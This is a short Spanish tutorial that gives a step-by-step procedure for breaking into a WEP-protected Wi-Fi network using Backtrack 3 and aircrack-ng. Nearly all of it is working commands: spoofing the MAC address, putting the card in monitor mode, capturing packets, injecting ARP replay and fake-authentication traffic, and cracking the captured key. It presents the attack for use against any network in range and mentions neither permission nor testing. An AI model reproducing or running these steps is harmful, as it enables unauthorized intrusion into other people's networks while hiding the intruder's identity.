TUTORIAL:
- En primer lugar deberemos descargar Backtrack 3 —-> Enlace de descarga (695 MB).
- Grabamos el software en un CD, reiniciamos la PC y colocamos el CD para que arranque Backtrack 3.
- Debemos abrir la consola (Shell), si conoces Linux estarás familiarizado con el termino.
- Tenemos que desactivar la tarjeta de red con el comando airmon-ng stop ath0, donde ath0 es el nombre de la placa, en este caso es altheros.
- Hay que cambiar la MAC, para ello escribimos: macchanger -m 11:22:33:44:55:66 wifi0.
- Arrancamos nuestra placa de red en modo monitor y escribimos: airmon-ng start wifi0.
- Escribimos: iwconfig para comprobar que todo lo que hicimos esta realizado correctamente.
- Revisamos si hay redes en nuestra área de cobertura, para ello escribimos: airodump-ng wifi0.
- Ahora lo importante de la imagen anterior es la MAC de la red (BSSID), el canal por donde se transmite la red Wi-Fi (CH), y el nombre de la red (ESSID).
Para detener la búsqueda de redes presionamos CTRL + C y escribimos los siguiente: airodump-ng –channel X –write XXX ath0. La “X” en channel se reemplaza por 5 en este caso y la “XXX”es el nombre con que guardamos la información, puede colocarse cualquier nombre.
- Abrimos otra ventana de Shell y escribimos: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0.
- Nuevamente abrimos otra ventana de shell y escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0.
- Bueno finalmente deberemos ser pacientes y esperar que los ARP sean altos (50.000), para así poder obtener la contraseña. Cuando tengamos suficiente datos para poder descifrar la password (lleva tiempo y experiencia), cerramos todos los Shell y escribimos: Aircrack-ng pass-01.cap, con esto descifraremos la contraseña encriptada.
